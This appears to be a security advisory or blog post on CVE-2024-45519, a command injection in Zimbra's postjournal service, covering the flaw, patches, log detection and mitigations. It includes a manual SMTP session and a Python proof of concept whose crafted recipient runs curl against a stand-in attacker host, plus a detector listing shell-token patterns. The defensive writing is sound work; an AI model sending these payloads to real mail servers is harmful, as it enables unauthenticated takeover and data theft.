CVE-2024-45519 - How Unauthenticated Users Can Exploit Zimbra’s postjournal Service

Zimbra Collaboration Suite (ZCS) is widely used for business email and collaboration and serves millions of users globally. In September 2024 Zimbra shipped fixes for a serious vulnerability in its postjournal service, tracked as CVE-2024-45519. It lets anyone who can deliver an email to an affected server run commands on that server, without logging in, and it was being exploited in the wild within weeks of the patches. That is as bad as it sounds.

If you run Zimbra on anything below 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9 or 10.1.1, you are at risk and should read on and patch ASAP.

What is the postjournal Service in Zimbra?

The postjournal service belongs to Zimbra's MTA (the Postfix side of the stack), not to the mailbox or web tier. When mail journaling is enabled, Postfix hands a copy of each message to a journal transport that connects to postjournal on local port 10027, and postjournal forwards it to the configured archiving or compliance destination. It is a native binary that runs as the zimbra user and is off by default. Because it sits in the mail flow and handles envelope data from untrusted senders, a bug here is reachable by anyone who can get a message delivered to the server.

Vulnerability: Unauthenticated remote command execution through the postjournal service

- CVSS Score: Critical. The bug is reachable over the network with no privileges and no user interaction; check the NVD entry for the current base score and vector string.

What’s the Risk?

Anyone who can deliver an email to a Zimbra server with postjournal enabled can make it execute shell commands as the zimbra user, with no account and no authentication. That user owns the whole Zimbra installation, so an attacker can read mailboxes and configuration, drop a reverse shell or web shell, or install malware and use the server as a foothold into the network.

The Issue

postjournal is a native binary. When it processes a journaled message it takes the recipient address straight from the SMTP envelope, formats it into a command string, and runs that string through popen(), which hands it to /bin/sh. Nothing strips or rejects shell metacharacters in the address, and nothing checks who submitted the message: the only gates are whether postjournal is enabled and whether Postfix accepted the mail in the first place.

In Python-flavoured pseudocode the mistake looks like this (simplified for demonstration; the real code is C):

import os

def postjournal_handler(envelope):
    # No validation of the address and no check on who sent the message
    recipient = envelope.get('rcpt_to')
    # A string handed to /bin/sh, which is exactly the popen() pattern
    os.system(f"echo {recipient} >> /opt/zimbra/journal.log")

Whatever arrives in RCPT TO is pasted into a shell command: a local part such as "x$(id)" is parsed by the shell and the command substitution runs as the zimbra user. The patched releases replaced popen() with execvp(), which takes an argument vector and involves no shell, and added a check that rejects addresses containing unsafe characters.
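To see the difference between the two patterns without touching a mail server, here is an added example that models the bug class in Python. It is not Zimbra's code: the real postjournal is C and formats the recipient into a popen() string, while this reproduces the same mistake with a harmless echo. The crafted address, the allow-list regex and the function names are all constructed for the example; the exact rules of Zimbra's input check are not reproduced.

```python
import re
import subprocess

# Constructed attacker address: a quoted local part carrying a command
# substitution, the same shape as the public proof of concept (example data).
CRAFTED = '"aabbb$(echo INJECTED)"@mail.example.com'
CLEAN = "bob@mail.example.com"


def journal_vulnerable(recipient: str) -> str:
    """popen()-style: the command is one string and /bin/sh parses it,
    so a $(...) inside the address is executed."""
    cmd = "echo journal recipient=" + recipient
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=True)
    return out.stdout.strip()


def journal_no_shell(recipient: str) -> str:
    """execvp()-style: the arguments are a vector and no shell is involved,
    so the address is passed through literally, whatever it contains."""
    out = subprocess.run(["echo", "journal recipient=" + recipient],
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


# Allow-list for what an envelope address may look like here. This regex is an
# assumption made for the example, not the rule the real patch applies.
SAFE_ADDRESS = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+$")


def journal_fixed(recipient: str) -> str:
    """What the patched releases do in spirit: reject unsafe input, and even
    for accepted input never go through a shell."""
    if not SAFE_ADDRESS.fullmatch(recipient):
        raise ValueError("recipient contains characters not allowed here")
    return journal_no_shell(recipient)


if __name__ == "__main__":
    print("vulnerable :", journal_vulnerable(CRAFTED))   # substitution ran
    print("no shell   :", journal_no_shell(CRAFTED))     # literal text
    try:
        journal_fixed(CRAFTED)
    except ValueError as exc:
        print("fixed      : rejected ->", exc)
    print("fixed      :", journal_fixed(CLEAN))
```

The vulnerable path prints aabbbINJECTED, because the shell expanded the substitution before echo ever ran; the argv path prints the address verbatim. The regex is defence in depth: the change that removes the vulnerability is dropping the shell, and the input check makes sure odd addresses are refused rather than passed along to the next program that might shell out.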

A manual SMTP session that triggers the bug looks like this (port 25 of the Zimbra MTA; the recipient domain must be one the server accepts mail for, and attacker.example stands for a host you control):

$ nc mail.yourcompany.com 25
EHLO attacker.example
MAIL FROM:<attacker@attacker.example>
RCPT TO:<"aabbb$(curl${IFS}attacker.example)"@mail.yourcompany.com>
DATA
Subject: test

hello
.
QUIT

The quoted local part is legal SMTP syntax, so Postfix accepts it. When the message is handed to the journaling transport, postjournal pastes that address into its shell command and the $(...) substitution runs curl as the zimbra user (${IFS} stands in for a space, which would otherwise break the address). The exploit is blind: nothing comes back over SMTP, so attackers confirm execution through the out-of-band callback; the public proof of concept points curl at an interactsh hostname.

Real-World PoC (Proof-of-Concept)

*Warning: Do not run this on production or without authorization!*

import smtplib

target = "mail.target.com"        # the Zimbra MTA, port 25
callback = "attacker.example"     # host you control, to observe the curl callback
# Quoted local part carrying a command substitution; ${IFS} replaces the space
malicious_rcpt = '"aabbb$(curl${IFS}' + callback + ')"@' + target

with smtplib.SMTP(target, 25, timeout=15) as smtp:
    smtp.ehlo("attacker.example")
    smtp.mail("attacker@" + callback)
    smtp.rcpt(malicious_rcpt)
    smtp.data(b"Subject: test\r\n\r\nhello\r\n")

A callback from the target to your host confirms execution. From there the same substitution can fetch and run a dropper, open a reverse shell, or read files such as /etc/passwd and Zimbra's own configuration, all as the zimbra user.

Look for Crafted Recipients in the MTA Logs:

Postfix on Zimbra logs to /var/log/zimbra.log. Search the to=<...> fields for shell syntax in the local part: $(, backticks, ${IFS}, | or ;. A legitimate address never needs these, so every hit deserves a look, and the client= line for the same queue ID tells you where the message came from.

Check for Abnormal Activity on the Host:

Child processes of postjournal that are shells or download tools (sh, bash, curl, wget) running as the zimbra user, outbound connections from the mail server to hosts it has no business talking to, new or modified files in /tmp or /opt/zimbra, and sudden spikes in CPU usage.
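The log check above is easy to automate. The following is an added example, not a tool from Zimbra or from this page's author: it scans Postfix-format log lines for recipients containing shell syntax and ties each hit back to the connecting client through the queue ID. The log lines are constructed for the example (the queue IDs, hosts and addresses are made up), and the token list is an assumption about what a crafted local part looks like, so extend it if you see other patterns.

```python
import re

# Constructed sample in the Postfix syslog format Zimbra writes to
# /var/log/zimbra.log. Made up for this example, not real log data.
SAMPLE_LOG = """\
Oct  2 14:03:12 mail postfix/smtpd[12345]: 4XAbCd001: client=unknown[203.0.113.9]
Oct  2 14:03:12 mail postfix/qmgr[2222]: 4XAbCd001: from=<attacker@attacker.example>, size=412, nrcpt=1 (queue active)
Oct  2 14:03:13 mail postfix/smtp[3333]: 4XAbCd001: to=<"aabbb$(curl${IFS}oast.example)"@mail.example.com>, relay=127.0.0.1[127.0.0.1]:10027, delay=0.4, status=sent (250 OK)
Oct  2 14:05:40 mail postfix/smtpd[12346]: 4XAbCd002: client=mx.partner.example[198.51.100.7]
Oct  2 14:05:41 mail postfix/lmtp[3340]: 4XAbCd002: to=<bob@mail.example.com>, relay=mail.example.com[127.0.0.1]:7025, delay=0.2, status=sent (250 OK)
Oct  2 14:06:02 mail postfix/smtp[3341]: 4XAbCd003: to=<"o'neil"@mail.example.com>, relay=127.0.0.1[127.0.0.1]:10027, delay=0.3, status=sent (250 OK)
"""

# "<daemon>[pid]: <queue id>: <rest>" is the common shape of Postfix lines.
LINE_RE = re.compile(r"postfix/\w+\[\d+\]: (?P<qid>[0-9A-Za-z]+): (?P<rest>.*)")
CLIENT_RE = re.compile(r"client=(?P<client>\S+)")
TO_RE = re.compile(r"to=<(?P<addr>[^>]*)>")

# Shell syntax that has no place in an email address (assumed list).
SHELL_TOKENS = ("$(", "`", "${", "|", ";", "&")


def shell_tokens_in(address):
    """Return the shell tokens present in an address, empty if it looks clean."""
    return [tok for tok in SHELL_TOKENS if tok in address]


def find_injection_attempts(log_text):
    """Scan log text; return one record per recipient that carries shell syntax,
    with the client that submitted the message when a client= line was seen."""
    clients = {}   # queue id -> client=... value from the smtpd line
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        qid, rest = m.group("qid"), m.group("rest")
        c = CLIENT_RE.search(rest)
        if c:
            clients[qid] = c.group("client")
        t = TO_RE.search(rest)
        if not t:
            continue
        tokens = shell_tokens_in(t.group("addr"))
        if tokens:
            hits.append({
                "queue_id": qid,
                "recipient": t.group("addr"),
                "client": clients.get(qid, "unknown"),
                "tokens": tokens,
            })
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['queue_id']}: {hit['recipient']} from {hit['client']} ({', '.join(hit['tokens'])})")
```

Only the first message is reported: the quoted local part in the third message is unusual but contains no shell syntax, which is the distinction you want, since quoted local parts are legal and do show up in real traffic. Run it over the whole of /var/log/zimbra.log and its rotated copies, and treat every hit as a confirmed attempt worth pulling the host artefacts for.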

How To Fix

Patch immediately!
- 8.8.15 Patch 46 Release Notes
- 9.0.0 Patch 41 Release Notes
- 10.0.9 and 10.1.1 Release Notes

If you can’t patch immediately

- Disable the postjournal service if you do not use mail journaling; it is off by default, and with it off the vulnerable code is never reached.
- Review the MTA's trusted networks (zimbraMtaMyNetworks) so only hosts that really are internal are treated as such, and keep port 25 behind your usual anti-spam and rate-limiting controls.
- Do not rely on a reverse proxy: the attack arrives as an email over SMTP, not as a web request, so blocking URL paths does nothing.

External References

- NIST NVD entry for CVE-2024-45519
- Zimbra Security Advisories page
- ProjectDiscovery's technical analysis of the bug and its patch
- Zimbra patch release notes linked above

Conclusion

CVE-2024-45519 is critical and easy to exploit, a dangerous mix. If postjournal is enabled and an attacker can get an email to your Zimbra MTA, they can execute commands as the zimbra user. Patch now, review your mail logs for crafted recipients, disable postjournal if you don't need it, and monitor your systems closely.

Stay safe, stay patched.

*If you found this useful, share with others in your IT community—and check your Zimbra servers today.*

Timeline

Published on: 10/02/2024 22:15:02 UTC
Last modified on: 10/04/2024 13:34:19 UTC